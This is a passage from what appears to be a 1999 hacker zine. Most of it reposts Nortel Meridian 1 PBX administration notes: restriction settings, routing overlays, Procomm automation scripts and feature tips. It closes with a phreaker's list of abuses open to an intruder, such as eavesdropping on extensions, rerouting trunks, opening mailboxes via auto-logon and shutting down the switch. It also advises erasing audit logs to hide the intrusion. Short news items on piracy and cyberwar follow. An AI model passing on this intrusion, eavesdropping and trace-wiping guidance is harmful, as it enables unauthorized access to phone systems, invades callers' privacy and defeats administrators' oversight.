TGAR AND TARG: ----------------------------- The best restriction is to have all trunk routes TARG'd to 1 and all TNs (including actual trunk TNs) TGAR'd to 1. This will block all access to direct trunk route selection. BENEFITS OF IMPLEMENTING THESE SECURITY RESTRICTIONS ---------------------------------------------------- No incoming caller will have access to an outside line unless physically transferred or conferenced by an internal party. If voice mail ports are SRE and NCOS 0 and have a TGAR matching the TARG - they will not be able to transfer a call out of the system, regardless of the voice mail system's resident restrictions assigned. No phone will be able to dial a trunk route access code. Consider allowing telecom staff this ability for testing. Layered security: ----------------- If in phone programming, TGAR was overlooked on a phone, the CTD class of service would block the user from dialing a 0 or 1 if they stumble upon a route access code. If in programming, the CTD class of service was overlooked, both TGAR and NCOS would maintain the restrictions. If in programming, the NCOS is overlooked, it will defaults to zero, which is totally restricted if NCTL and RLBs are set up correctly. Quick Tour of a Simple Meridian 1 BARS Call ------------------------------------------- Basic Automatic Route Selection. If you dial "9", you are accessing BARS. "9" is the "BARS Access Code" 1. A telephone dials "9" - BARS activates. 2. The telephone calls a number - Example: 1-312-XXX-XXXX 3. The PBX hold the digits while it looks up "1-312" to figure out what Route List to use for processing the call. 4. The Route List determines the possible trunk routes that can be used. 5. The Route List checks the facility restriction level of the telephone and compares it to its own required facility restriction level. 6. The Route List checks to see if any special digit manipulation should be performed. LD90 NET -------- The LD90 Network overlay is where area codes and exchanges are defined. If a prefix is not entered into LD90, it cannot be dialed through BARS. Each area code or exchange refers to a "Route List" or RLI which contains the instructions for routing the call. >ld 90 ESN000 REQ prt CUST 0 FEAT net TRAN ac1 TYPE npa NPA 1312 NPA 1312 <-- This is the network number (prefix) RLI 11 <-- This is the Route List that the prefix gets instruction from DENY 976 <-- This is an exchange in NPA 312 that is blocked SDRR DENY CODES = 1 DMI 0 ITEI NONE REQ end LD86 RLB (or RLI) ----------------- The RLB is a "list" of possible trunk routes that an area code or exchange can be dialed over. Each "ENTR" or list entry contains a trunk route. Each entry also has a "minimum Facility Restriction Level" or "FRL" that must be met before a phone can access that entry. In the following example, the first entry can be accessed by phones whose NCOS equals an FRL of 3 or above. The second entry can only be accessed by phones whose NCOS equals an FRL of 6 or above. Along with the trunk route and the FRL, you can apply specific "digit manipulation" with the DMI entry. The DMI entries are explained here. >ld 86 ESN000 REQ prt CUST 0 FEAT rlb RLI 11 RLI 11 ENTR 0 <-- This is the list's first "Entry Number" LTER NO ROUT 15 <-- This is the first choice Trunk Route Number TOD 0 ON 1 ON 2 ON 3 ON 4 ON 5 ON 6 ON 7 ON CNV NO EXP NO FRL 3 <-- This is the Facility Restriction Level DMI 10 <-- This is the Digit Manipulation Index Number FCI 0 FSNI 0 OHQ YES CBQ YES ENTR 1 <-- This is the list's second "Entry Number" LTER NO ROUT 9 <-- This is the second choice Trunk Route Number TOD 0 ON 1 ON 2 ON 3 ON 4 ON 5 ON 6 ON 7 ON CNV NO EXP YES <-- This is considered the "expensive" choice FRL 6 <-- Note that the Facility Restriction Level is higher DMI 0 <-- Note no digit manipulation is required for this trunk route FCI 0 FSNI 0 OHQ YES CBQ YES ISET 2 MFRL 3 REQ end LD87 NCTL --------- The FRL to NCOS "relationship" is built in the NCTL data block. The FRL and the NCOS do not necessarily have the equal one another, however they usually do. A higher FRL/NCOS has more capability than a lower FRL/NCOS. For an NCOS number to have any capability, it must first be defined in the NCTL data block. >ld 87 ESN000 REQ prt CUST 0 FEAT nctl NRNG 0 7 <-- Range from NCOS 0 through 7 was requested SOHQ NO SCBQ YES CBTL 10 --------------- NCOS 0 EQA NO FRL 0 RWTA NO NSC NO OHQ NO CBQ NO MPRI 0 PROM 0 --------------- NCOS 1 EQA NO FRL 1 RWTA NO NSC NO OHQ NO CBQ YES RETT 10 RETC 5 ROUT I RADT 0 SPRI 0 MPRI 0 PROM 0 --------------- NCOS 2 EQA NO FRL 0 RWTA NO NSC NO OHQ NO CBQ NO MPRI 0 PROM 0 --------------- NCOS 3 EQA NO FRL 3 <-- NCOS 3 equals FRL 3. RWTA YES NSC NO OHQ NO CBQ YES RETT 10 RETC 5 ROUT I RADT 10 SPRI 0 MPRI 0 PROM 0 --------------- NCOS 4 EQA NO FRL 4 RWTA YES NSC NO OHQ NO CBQ YES RETT 10 RETC 5 ROUT A RADT 10 SPRI 0 MPRI 0 PROM 0 --------------- NCOS 5 EQA NO FRL 5 RWTA NO NSC NO OHQ NO CBQ YES RETT 10 RETC 5 ROUT A RADT 10 SPRI 0 MPRI 0 PROM 0 --------------- NCOS 6 EQA NO FRL 6 <-- NCOS 6 equals FRL 6. RWTA NO NSC NO OHQ NO CBQ YES RETT 10 RETC 5 ROUT A RADT 0 SPRI 0 MPRI 0 PROM 0 --------------- NCOS 7 EQA NO FRL 7 RWTA NO NSC NO OHQ NO CBQ YES RETT 10 RETC 5 ROUT A RADT 0 SPRI 0 MPRI 0 PROM 0 TOHQ NONE LD86 Digit Manipulation ----------------------- The Digit Manipulation data blocks are where special prefixes are entered before numbers are sent out over trunks. An example of digit manipulation is where a 1010XXX carrier access code must be inserted before a number is processed over a trunk. REQ prt CUST 0 FEAT dgt DMI 10 DMI 10 <-- This is simply the index number. DEL 1 <-- This says "delete the first digit after "9" CTYP NCHG REQ prt CUST 0 FEAT dgt DMI 3 DMI 3 DEL 0 <-- This says "delete nothing after 9" INST 101288 <-- This says "Insert 101288 after 9 and before the actual number dialed" CTYP NCHG REQ end Telephone --------- This is simply a telephone's data block DES 5135 TN 004 0 14 00 TYPE 500 CDEN 4D CUST 0 DN 5135 MARP CPND NAME Typical User XPLN 9 DISPLAY_FMT FIRST,LAST AST NO IAPG 0 HUNT TGAR 1 LDN NO NCOS 5 <-- What FRL does this equal? SGRP 0 RNPG 0 LNRS 16 XLST SCI 0 CLS CTD DTN FBD XFA WTA THFD FND HTD ONS LPR XRA CWD SWD MWA LPD XHD CCSD LNA TVD CFTD SFD C6D PDN CNID CLBD AUTU ICDD CDMD EHTD MCTD GPUD DPUD CFXD ARHD OVDD AGTD CLTD LDTA ASCD MBXD CPFA CPTA DDGA NAMA SHL ABDD CFHD USRD BNRD OCBD RCO 0 PLEV 02 FTR CFW 4 DATE 28 NOV 1978 LD86 ESN - the Start of BARS ---------------------------- The ESN data block is the root of BARS. Before BARS can be set up, the ESN data block must be defined. >ld 86 ESN000 REQ prt CUST 0 FEAT esn MXLC 0 MXSD 30 MXIX 0 MXDM 100 MXRL 80 MXFC 60 MXFS 0 MXSC 120 NCDP 4 AC1 9 <-- This is where "9" is defined AC2 DLTN YES ERWT YES ERDT 0 TODS 0 00 00 23 59 <-- This section refers only to time of day routing controls RTCL DIS NCOS 0 - 0 <-- This section refers only to time of day routing controls NCOS 1 - 1 NCOS 2 - 2 NCOS 3 - 3 NCOS 4 - 4 NCOS 5 - 5 NCOS 6 - 6 NCOS 7 - 7 NCOS 99 - 99 ETOD TGAR NO REQ end ISLUA 99 Session BA 20 Capturing Data From Your Meridian 1 to Various PC Software Packages Curt Kempf City of Columbia, Missouri Thanks for attending the workshop I hope you find this information helpful ======================================== o ACD Daily Report o Procomm Plus Script to capture ACD reports to disk. Format: MMDDYY.TXT o TN PRT out of Host MCA card o Procomm Script to CHG a TN when it becomes IDLE o Procomm Script to CHG/NEW a list of DNs and their NAMES (LD 95) o Procomm Script to monitor PBX for "DTA0021", "INI0", "PWR01", then send an alpha numeric page when received. ACD Daily Report ================ ACD 000 1999 03 29 17:00 DAILY TOTALS REPORT REPT 1 ACD AVG CALLS AVG AVG AVG AVG DN AVG #-XFER AVG-TIME-POSN DN AGTS ANSWD ASA DCP PCP WORK WAIT CALLS TIME IDN ACD BUSY MANNED 7380 324 54 125 388 514 127 118 69 0 28 22085 27246 ------------------------------------------------------------------------------ 1 324 54 125 388 514 127 118 69 0 28 22085 27246 REPT 2 ACD CALLS RECALL ANSWERED ABANDONED TOF TOF OVER INTER DN ACCPTED TO LONGEST NO. AVG.WT TSF IN OUT FLOW FLOW SOURCE WT. TIME BUSY 7380 366 0 476 43 88 80 0 0 8 0 ------------------------------------------------------------------------------ 1 366 0 476 43 88 80 0 0 8 0 REPT 4 POS CALLS AVG AVG AVG DN INC DN OUT #-XFER BUSY MANNED ID ANSWD DCP PCP WAIT INC TIME OUT TIME IDN ACD TIME TIME ACD DN 7380 301 81 136 115 142 3 66 12 352 0 9 20716 32208 303 57 91 261 139 4 478 15 652 0 4 20788 28702 309 49 90 2 182 0 0 1 100 0 7 4550 13466 304 87 128 127 108 1 60 12 564 0 6 22662 32088 305 39 185 108 73 0 0 2 96 0 1 11464 14302 308 0 ***** ***** ***** 15 1770 20 1464 0 0 32256 32400 306 0 ***** ***** ***** 9 2950 13 1660 0 0 32400 32400 312 11 145 2686 50 4 286 7 416 0 1 31848 32400 ------------------------------------------------------------------------ 8 324 125 388 127 36 93 82 88 0 28 2945 3633 Procomm Plus Script to capture ACD reports to disk. Format: MMDDYY.TXT ==================================== ; ProComm script by Chris Fourroux & Curt Kempf/City of Columbia - tested ; with ProComm Plus 32 95/NT, version 4. Script to caputure ACD reports to ; disk with the format XXXXXX.txt, where XXXXXX is month day year. Script ; waits for "ACD DN 7380" to occur, which is on every hourly report, then ; closes and appends the newest statistics to MMDDYY.TXT file. string cmd="ncopy c:\capture\" string szFileName = $DATE string szDate = $DATE integer Pos = 0 proc main dial data "Option 61" set capture overwrite OFF ; if capture file exists, append data to it. capture off ; close capture file if it is open when TARGET 0 "ACD DN 7380" call CLOSECAP Startloop: clear ; clear contents of screen and scroll back buffer szFileName = $DATE szDate = $DATE while 1 if nullstr szFileName ; Check to see if we've reached exitwhile ; the end of source string endif ; and if so, exit loop. if strfind szFileName "/" Pos ; Check for char strdelete szFileName Pos 1 ; and delete it else exitwhile ; exit if no more characters endif endwhile strcat szFileName ".txt" set capture file szFileName ; Set name of capture file. capture on ; Open up the capture file. while strcmp $DATE szDate ; Loop while date is the same endwhile ; or if the date changes, capture off ; Close the capture file. goto Startloop ; and start a new one. endproc proc closecap pause 3 strcat cmd szFileName ; Append to variable "CMD" strcat cmd " h:\uab\" ; Append network drive to "CMD" transmit "^M***********^M" ; Put in asteriks between hourly reports capture off ; Close capture file pause 5 DOS cmd HIDDEN i0 ; Run "CMD" in DOS and copy file to the LAN pause 10 taskexit i0 ; Exit DOS window pause 10 cmd="ncopy c:\capture\" ; Reset "CMD" capture on ; Turn Capture back on. Endproc Procomm Screen of dialing up the host MCA card(direct connect 9600 baud) ===================================== ENTER NUMBER OR H (FOR HELP): 2206 CALLING 2206 RINGING ANSWERED CALL CONNECTED. SESSION STARTS logi PASS? TTY #02 LOGGED IN 08:59 11/4/1999 > TN PRT out of Host MCA card DES 2206 TN 020 0 04 31 ;note TN is TN of voice set(20 0 4 15) +(plus) 16 TYPE 2616 CDEN 8D CUST 0 AOM 0 FDN TGAR 1 LDN NO NCOS 2 SGRP 0 RNPG 0 SCI 0 SSU XLST SCPW CLS CTD FBD WTD LPR MTD FND HTD ADD HFD MWD AAD IMD XHD IRD NID OLD DTA DRG1 POD DSX VMD CMSD CCSD SWD LND CNDD CFTD SFD DDV CNID CDCA ICDD CDMD MCTD CLBD AUTU GPUD DPUD DNDD CFXD ARHD FITD CLTD ASCD CPFA CPTA ABDD CFHD FICD NAID DDGA NAMA USRD ULAD RTDD PGND OCBD FLXD FTTU TOV 0 MINS DTAO MCA PSEL DMDM HUNT PSDS NO TRAN ASYN PAR SPACE DTR OFF DUP FULL HOT OFF AUT ON BAUD 9600 DCD ON PRM HOST ON VLL OFF MOD YES INT OFF CLK OFF KBD ON RTS ON PLEV 02 AST IAPG 0 AACS NO ITNA NO DGRP DNDR 0 KEY 00 SCR 2206 0 MARP 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 DATE 30 DEC 1997 Very rarely, I can not dial up the host MCA card. It simply won't answer, so the following usually clears it up: ITEM ITEM OPE YES DCD ON PRM OFF If that doesn't work, since 020 0 04 31 is "digital", it could be disabled. LD 32 and ENLU it. Procomm Script to CHG a TN when it becomes IDLE =============================================== string TN ;TN string TIPE ;TYPE, however word is reserved in ASPECT string EYETEM ;ITEM, ditto above. string szList ;List of items. string szItem ;Item selected from list. integer Event ;Dialog box event. integer Num ;integer value proc MAIN set txpace 50 ;delay for keyboard when TARGET 0 "IDLE" call CHGIT ;when receive IDLE, go change set. ;Input the TN, TYPE, and ITEM sdlginput "LD 11, CHG when IDLE :-)" "Enter TN: " TN if strcmp TN "" ; compare to see if NULL? halt ;if enter is pressed, halt script. else endif ; Display dialog box with list of items. ; Pick if set is a 500, 2008, or 2616 szList = "2616,2008,500" dialogbox 0 55 96 100 74 11 "LD 11, CHG when IDLE :-)" listbox 1 5 5 90 40 szList single szItem pushbutton 2 28 52 40 14 "&Exit" ok default enddialog while 1 dlgevent 0 Event ; Get the dialog event. switch Event ; Evaluate the event. case 0 ; No event occurred. endcase case 1 if strcmp szItem "2616" tipe = "2616" else if strcmp szItem "2008" tipe = "2008" else if strcmp szItem "500" tipe = "500" endif endif endif endcase default ; Exit case chosen. exitwhile endcase endswitch endwhile dlgdestroy 0 CANCEL ; Destroy the dialog box. sdlginput "LD 11, CHG when IDLE :-)" "ITEM: (IE: CLS HTA)" EYETEM Transmit "LD 11^M" ;Go in to overlay 11 Waitfor "REQ" for Num = 0 upto 100 ;Keep STAT'n til IDLE Transmit "STAT " Transmit TN Transmit "^M" pause 10 ; wait 10 seconds endfor endproc PROC CHGIT Transmit "CHG^M" ;Go change the set, then halt the script. Waitfor "TYPE" Transmit TIPE pause 1 ;pause 1 second Transmit "^M" Waitfor "TN" Transmit TN Transmit "^M" Waitfor "ECHG" Transmit "YES^M" Waitfor "ITEM" Transmit EYETEM Transmit "^M" waitfor "ITEM" transmit "^M" Waitfor "REQ:" Transmit "END^M" halt endproc Procomm Script to CHG/NEW a list of DNs and their NAMES (LD 95) =============================================================== integer flag=0 ;set flag proc main set txpace 100 ;delay for keyboard when TARGET 1 "SCH2115" call LD95NEW ;wait for 'name does not exit' error ;open text file that has a list of ;DNs & NAMEs you want to change/add. fopen 1 "C:\phone\chgnames.txt" READ ;chgnames.txt it in the format of ; 7354, Jane Doe ; 6745, John Smith ; 7645, Dan White ;script doesn't care if the NAME is NEW or CHG J if failure usermsg "could not open the file." else Transmit "LD 95^M" ;Go in to overlay 95 Waitfor "REQ" Transmit "CHG^M" Waitfor "TYPE" Transmit "NAME^M" Waitfor "CUST" Transmit "0^M" Waitfor "DIG" Transmit "^M" fseek 1 0 0 while 1 fgets 1 s0 if FEOF 1 exitwhile endif strtok s1 s0 "," 1 strtok s2 s0 "," 1 DelStr (&s1) DelStr (&s2) DelLineFeed (&s2) ;strfmt s4 "TN: %s" s1 ;uncomment these two for ;usermsg s4 ;troubleshooting the script strlen s1 i0 if (i0 > 2) LD95CHG () else Transmit "****^M" halt endif endwhile endif endproc proc LD95CHG Waitfor "DN" Transmit s1 Transmit "^M" pause 1 if FLAG==1 FLAG=0 Transmit "^M" return else Transmit s2 Transmit "^M" Waitfor "DISPLAY_FMT" endif endproc proc LD95NEW FLAG=1 Transmit "^M" Transmit "**^M" Waitfor "REQ" Transmit "NEW^M" Waitfor "TYPE" Transmit "NAME^M" Waitfor "CUST" Transmit "0^M" Waitfor "DIG" Transmit "^M" Waitfor "DN" Transmit s1 Transmit "^M" Waitfor "NAME" Transmit s2 Transmit "^M" Waitfor "DISPLAY_FMT" Transmit "^M" Waitfor "DN" Transmit "^M" Waitfor "REQ" Transmit "CHG^M" Waitfor "TYPE" Transmit "NAME^M" Waitfor "CUST" Transmit "0^M" Waitfor "DIG" endproc proc DelStr param string szStr integer Pos while 1 if StrFind szStr "`"" Pos StrDelete szStr Pos 1 else exitwhile endif endwhile endproc PROC DelLineFeed param string szStr integer Pos strlen szStr Pos if (Pos > 2) StrDelete szStr (Pos-1) 1 endif endproc You could very easily modify this script to say, change an ASCII list of TNs /TYPEs to TGAR 1, and have it executed at 2:00 a.m. The s0 and s1 variables would change from DN & NAME, to TN & TYPE, and add Waituntil "2:00:00" "7/16 /99" to kick it off at 2:00 a.m. Procomm Script to monitor PBX for "DTA0021", "INI0", "PWR01", then send an alph numeric page when received. ======================================================================= proc Main #DEFINE pagernum "235.5334" ;Enter your pager number here. string szName="OPT61.cap" ;Name of text file to capture to. string passw when TARGET 1 "DTA021" call DTA021 ;what do you want to 'wait for' ? when TARGET 2 "INI0" call INI0 when TARGET 3 "PWR01" call PWR0 set capture file szName capture on set txpace 150 ;delay for keyboard HANGUP Dial DATA "MCA" transmit "^M" waitfor "HELP):" transmit "2206^M" waitfor "SESSION STARTS" while $CARRIER transmit "****" pause 1 transmit "LOGI^M" waitfor "PASS?" sdlginput "Security" "Password: (all caps!)" passw MASKED if stricmp passw "sss" ;to bypass logging in. transmit "*" call loggedin endif transmit passw transmit "^M" pause 2 endwhile set txpace 1 endproc proc DTA021 pageA() ;dial paging provider TRANSMIT "Digital Trunk Diagnostic. Frame alignment persisted for 3 seconds^M" ;send specific x11 error to pager pageB() ;end connection to provider mcacard() ;connect back to Option 61 endproc proc INI0 pageA() TRANSMIT "An initialization has taken place.^M" pageB() mcacard() endproc proc PWR0 pageA() TRANSMIT "Power failure from power and system monitor.^M" pageB() mcacard() endproc proc mcacard HANGUP PAUSE 2 Dial DATA "MCA" ;Connect up to option 61 through MCA card. while $DIALING endwhile transmit "^M" pause 1 transmit "^M" waitfor "HELP):" transmit "2206^M" waitfor "SESSION STARTS" pause 1 when RESUME call loggedin loggedin() endproc proc loggedin while $CARRIER ;wait for errors to occur. Continue to do your MACs etc.. endwhile endproc proc pageA when SUSPEND set port dropdtr on pause 1 hangup ;hangup Option 61 connection pause 2 hangup ;release mca card from COM port set port dropdtr off pause 1 Dial DATA "TriStar" ;Dial your paging provider while $DIALING endwhile TRANSMIT "^M" ;TAPI protocol, M puts in manual mode. WAITFOR "ID=" TRANSMIT "M^M" WAITFOR "Enter pager" TRANSMIT pagernum TRANSMIT "^M" WAITFOR "Enter alpha" endproc proc pageB TRANSMIT "^M" WAITFOR "More Pag" TRANSMIT "^M" pause 2 endproc Little Known Meridian 1 Features And Programming Tricks ======================================================= HELP and Error Lookup HELP - Type " ? " at many prompts LOOKUP - At " > " sign, type ERR AUD028 to find out what AUD028 indicates. At any other prompt, type " ! ", then you will receive " > " symbol for getting ERR lookup. Find Sets with a Certain Feature ================================ LD81 REQ LST FEAT CFXA FEAT UNR Lists all sets that have the "Call Forward External Allow" feature, then lists all UNR sets. Inventory and Identification Commands ===================================== LD32 IDU l s c u (or) IDC l s c LD22 CINV (and) ISSP LD30 UNTT l s c u Speed Call Stuff ================ Create many Speed Call lists at once. LD18 REQ: NEW 100 - Creates 100 lists. When memory is plentiful, make Speed Call list number the same as the persons DN. Need to increase MSCL in LD17 Find a "Controller" in LD81 by: REQ:LST, FEAT:SCC, then the Speed List Number Allow Restricted Sets to Dial Certain Long Distance Numbers. ============================================================ Add the numbers to a System Speed Call List. Assign an NCOS to the "List" that replaces the users NCOS during the call. Alternate: Add the suffix of the telephone number to an ARRN list in the prefixes RLI. This will point only that number to a new RLI with a lower (or higher if you choose) FRL. Look up ARRN in LD86 PBX Clock Fast or Slow? ======================= LD2 SDTA X Y -- x y X = 0 for "subtract time each day" -or- 1 for "add time each day" Y = 0-60 seconds to be added or subtracted each day. Daylight Savings Question? TDST Look this one up in LD2 before changing Phantom DNs, TNs, and "MARP to Voice Mail" TNs ============================================== Phantom TN with FTR DCFW ACD Queues with NCFW but no Agents 2616 Sets with AOMs (AOMs can be in "software", but do not need to be "installed" on the set). This is an excellent "MARP TN" for DNs that need to HUNT/FDN to Voice Mail Digit Display on Trunk Routes and ACD Queues ============================================ Find Trunk Route Access Codes - name in LD95 like any other DN ACD Numbers - name in LD95 like any other DN IDC Numbers - name in LD95 at DCNO prompt. Limited Access Passwords ======================== Print PWD in LD22 before starting LD17 LAPW 01 PW01 12345 OVLA 10 11 20 Identify Trunks, Routes and TTY Ports with "DES" Entry ====================================================== LD17 ADAN DES can be 1-16 characters LD16 RDB DES can be 1-16 characters LD14 TRK DES can be 1-16 characters TKID - enter telephone number Free Up or Block DN Range ========================= Change your SPRE Code to 4 digits LD15 - SPRE XXXX Assign all current feature codes as Flexible Feature Codes To hide DNs from appearing in LUDN printouts, enter DN prefix ranges as an FFC for "Ring Again Activate" Save "Call Forward" Status upon Reload/Sysload ============================================== LD17 CFWS YES Call Waiting "Buzz" on Digital Sets is Not Long Enough ====================================================== Turn on Flexible Incoming Tones Allowed LD15 OPT SBA DBA LD 11 CLS FITA "DSP" Display Key Applications ============================== Youre on the phone, another call comes in...Press DSP, then ringing line to see whos calling. Press DSP, then Speed Call, then entry number to view entries. Rls23 Update - automatic Display CLS TDD NHC - No Hold Conference ======================== With NHC, other party is not placed on hold while adding conferees. You can also disconnect conferee called with NHC LD11 KEY X NHC Rls23 Update - Conf. Display/Disconnect LD11 CLS CDCA Call Forward Indication on 2500 Sets ==================================== Add Call Forward Reminder Tone. Special dial tone is heard only when call forwarded. LD15 OPT CFRA Override Call Forwarded Phone ============================= Add Flexible Feature Code for "CFHO". Dial CFHO code, then dial extension. LD57 CODE CFHO On sets needing ability to perform override CLS CFHA Call Forward ONLY Internal Calls - Let Externals Ring ===================================================== Great when you need to prioritize external callers. LD11 KEY X ICF 4 ZZZZ "Delayed" Ring on Multiple Appearance DNs ========================================= Non-ringing (SCN) keys will ring after a certain duration. Great for areas where many of the same DNs appear. LD11 DNDR X (X = 0-120 seconds of delay before SCN keys will start to ring) Audible Reminder of Held Calls ============================== Receive "buzz tone" every X seconds to remind user that call is on hold. Also reminds user that Conference/Transfer was mishandled - call was never transferred LD15 DBRC X (X = 2-120 seconds between reminders) LD11, CLS ARHA Which Call "On Hold" is Mine ============================ Exclusive Hold sets held calls to "wink" at holding set, but stay "steady" at other sets. LD10/11 CLS XHA Change Ring Cadence/Tone ======================== There are 4 ring styles, adjusted in the CLS of the digital set. LD11 CLS: DRG1 -or- DGR2 -or- DRG3 -or- DRG4 Set pesky customer phones to DRG4 ! BFS - Nightmare in Shining Armor ? ================================== BFS Keys allow the user to monitor the Call Forward and busy status of a set, activate and deactivate Call Forward, and can be used as an Autodial key. NOTE: Cannot perform MOV command with BFS. User can also forward sets by accident. LD11 Key XX BFS l s c u (target sets TN) More Than 4 DNs Answered by One Mailbox? ======================================== Add up to 3 DNs to DN list in mailbox programming. Add 4th and all additional DNs in "Voice Service DN" (VSID) Table and set to "EM" to the mailbox. 1 Single LineTelephone, 3 DNs, 3 Users, 3 Mailboxes? How? ========================================================= Create one 2500 set with one of the three DNs. Create 2 Phantom TNs, each one with a new DN and DCFW each of them to the 2500 sets DN (from above) Add the three mailboxes…now any of the three numbers will ring the one set, but messages will be separated! Change An NCOS After Hours ========================== Here's an excerpt from the LD86 ESN data block that has NCOS 3 & 4 change to NCOS 2 after 4:30PM and all day on weekends AC1 9 AC2 DLTN YES ERWT YES ERDT 0 TODS 0 06 00 16 29 7 00 00 05 59 7 16 30 23 59 RTCL YES NCOS 0 - 0 NCOS 1 - 1 NCOS 2 - 2 NCOS 3 - 2 NCOS 4 - 2 NCOS 5 - 5 Oops..the Console Went Into NITE...During the DAY! ================================================== Use NITE entries that are based on "Time of Day". See Night Service in Features Book If the console goes into NITE during the day, send them to either a set of DNs next to the console, or a voice menu/thru-dialer explaining that there are "technical difficulties". After hours, NITE calls goes to where they should. Just Two Security Tricks ======================== Create SPNs in BARS of: 000 thru 009 and create a Route List Block for them with LTER=YES Now when Phreakers ask for extn 9000, they get nobody. Use the FLEN entry on SPNs 0, 00, 011 so that nobody can transfer a caller to 9011, 90, etc. Break Into Meridian Mailbox? ============================ Simply make the mailbox "Auto-logon". For remote access, add their DN to your set. Convenient if you need to access an employees mailbox without changing their password. Useful for modifying greetings of an absent employees or allowing a temporary employee access to a mailbox without divulging the regular employees password. Tracing Phone Calls =================== TRAC 0 XXXX (X=extension) TRAC l s c u TRAC l s c u DEV (Adds BARS info) TRAT 0 X (X=Console number) TRAD (see book, traces T1 channels) ENTC (see book, traces TN continuously - up to 3 TNs at a time ! ) Forgot your M3000 Directory Password? ===================================== LD32 CPWD l s c u Another Idea ============ Use a PC to log into your PBX, then activate the "capture file". Now run a TNB and keep it as a file rather than on paper. If your TNB file is large, try a high power text editor, which can open even 20meg files in seconds. Search the Internet "Text Editor" Keep copies so you can go back and see how a set was programmed when you out it by mistake. */ Using the above information you could sucessfully do the following: a) Setup your own trunk configurations that allow outgoing calls. b) Reset lines and trunks, reconfugure lines and trunks. c) Set an internal extension(s) to share the same multiplexed trunk as you so you can effectivly listen in on any incomming/outgoing phone call made on that extension. d) Set up calls that don't exist with no trunk assignment. e) Set any users voicemail box with auto-logon paremters temporarily. f) Close down the entire network g) Set every phone in the company to ring forever... h) Re-route incomming/outgoing trunk calls to any destination. i) Park your own incomming line as "on console" so you can answer calls made to a pre-set extension. j) Make yourself the company oprtator. k) Trace phonecalls, audit logs etc. l) Set all trunks to loopback on one another. m) Anything you want? Thats just a few ideas. But before you do ANYTHING, you should be aware that anything you do could have devestating impact on the companys phone switch. For example, say you accidently commanded the system to shut down.. You would effectivly be killing 6000+ peoples phone lines, which would yield colosal financial burden/loss onto the company. Generaly I'm just saying, be nice.. Just because you have the power to do such things, it doesnt mean you have to do it. :) A final note: In the aftermath of obtaining access to a merdian switch, it is generaly advisable to erase all trace of you ever being on there. This can be achived by reseting trunk audit logs, and erasing any log of your incoming trunk setups. Therefore, if the real admin decided to track what was going on he/she would get nowhere because the lines you used to initially call into the system DO NOT EXIST. Its just a case of using your imagination. Don't be destructive, Don't alter anything that would be noticed, Generally don't be a f00l.. Thats the end of this file, I hope you enjoed it. Take it easy. Shouts to D4RKCYDE, NOU!, b4b0, 9x, subz, pbxphreak, lusta, gr1p, LINEMANPUNX. . .. ... .......... BL4CKM1LK teleph0nics .......... ... .. . . .. ... .......... http://hybrid.dtmf.org ......... ... .. . @HWA 31.0 Adobe Fingers EBay Pirates ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by deepquest Information from Adobe provided to federal law enforcement officials lead to the arrest and indictement of two people from West Virginia who have allegedly attempted to auction off pirated copies of Adobe products online. Andover News http://www.andovernews.com/cgi-bin/news_story.pl?72306/topstories Top Stories Adobe Systems Helps Feds Nab EBay Software Pirates 11/03/99 SAN JOSE, CALIFORNIA, U.S.A., 1999 NOV 3 (Newsbytes) -- By Sherman Fridman, Newsbytes. Two alleged software pirates are about to walk the judicial plank as a result of a Federal indictment that was announced today. Ralph Gussie Sumlin, Jr. and Elizabeth Jean Sumlin, both of Farmington, W.Va., were charged in one-count indictments alleging that they willfully infringed on copyrights owned by Adobe Systems Inc. [NASDAQ:ADBE]. The indictments said that the copyright violations occurred when the Sumlins attempted to auction what is believed to be pirated Adobe software on eBay's online auction site. In an announcement made by Adobe Systems after the indictments were handed out, Batur Oktay, corporate counsel for Adobe is reported to have said, "Based on our investigations, we have found that the vast majority of Adobe software sold on these sites is pirated." He also said that, "Adobe will continue its aggressive campaign against Internet piracy." Adobe Systems reportedly worked in close collaboration with the FBI, Postal Inspection Service, and the Fairmont, Calif., police department in this case. In an ongoing effort to enforce copyright compliance, Adobe has partnered with anti-piracy organizations such as The Business Software Alliance (BSA) and the Software Publisher's Association (SPA) to investigate and sue end-users and resellers of pirated software. In addition, Adobe is encouraging consumers to report sellers of counterfeit Adobe products, and has established the e-mail address piracy@adobe.com for this purpose. Reported by Newsbytes.com, http://www.newsbytes.com 09:29 CST Reposted 10:16 CST @HWA 32.0 India, Syria, Iran Have Offensive Cyberwar Abilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by some1 India, Syria, Iran have been labeled as the most sophisticated countries out of twenty three who are believed to have the capacity to engage in state-sponsored, electronic warfare. (Unfortunately This article does not mention where this information comes from.) Detroit News http://detnews.com/1999/technology/9911/03/11030116.htm India, Syria, Iran adept at e-raids Lisa Hoffman / Scripps Howard News Service WASHINGTON -- So far, as many as 23 countries are believed to have the capacity to engage in state-sponsored, surreptitious electronic raids. Among the most sophisticated: India, Syria and Iran, experts say. Some nations already have taken the leap: Indonesia: Its government in January was identified as being behind a coordinated assault on Ireland's Internet service provider, which hosted a Web site advocating independence for the province of East Timor. Russia: Hackers working for the Russian government targeted Pentagon computer networks between January and May, apparently in search of naval codes and missile guidance data. Pentagon officials say the attacks failed to penetrate classified systems. China: It launched an assault an array of U.S. government Web sites, including those of the departments of Energy and Interior and the White House's public site, which was knocked out of commission three times. These occurred after a U.S. bomb accidentally struck the Chinese Embassy in Belgrade in May during the conflict with Yugoslavia. The assault was triggered by outraged Chinese government operatives, apparently letting their emotions get the better of them. They lobbed a fusillade of electrons but, by doing so, also revealed an astonishing 3,000 to 4,000 "back doors" into U.S. computer systems that had been created by China, according to Jay Valentine, head of Infoglide Corp., an Austin, Texas, company that investigates computer security breaches for the U.S. government. Valentine estimates that number of secret passages amounts to only about 5 percent of those China has managed to establish in both government and private industry systems. Even more sobering is the public discussion now going on within China's top military leadership circles about the desirability of developing a "dirty war" strategy, in which computer viruses would be used against the West. Revelations such as these are adding urgency to the Pentagon's efforts to fortify its systems against incursions and cobble together a war-fighting doctrine to guide its own conduct of cyber combat. Defense leaders have designated the U.S. Space Command in Colorado Springs, Colo., as the headquarters for both offensive and defensive cyber war, although it won't come online until next October. @HWA 33.0 Singapore Launches Probe Into Defacement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre A recent defacement of a government web site in Singapore has caused the National Computer Board to launch an investigation. Singapore officials said that they will work closely with their foreign counterparts to investigate and track the perpetrators. The Straits 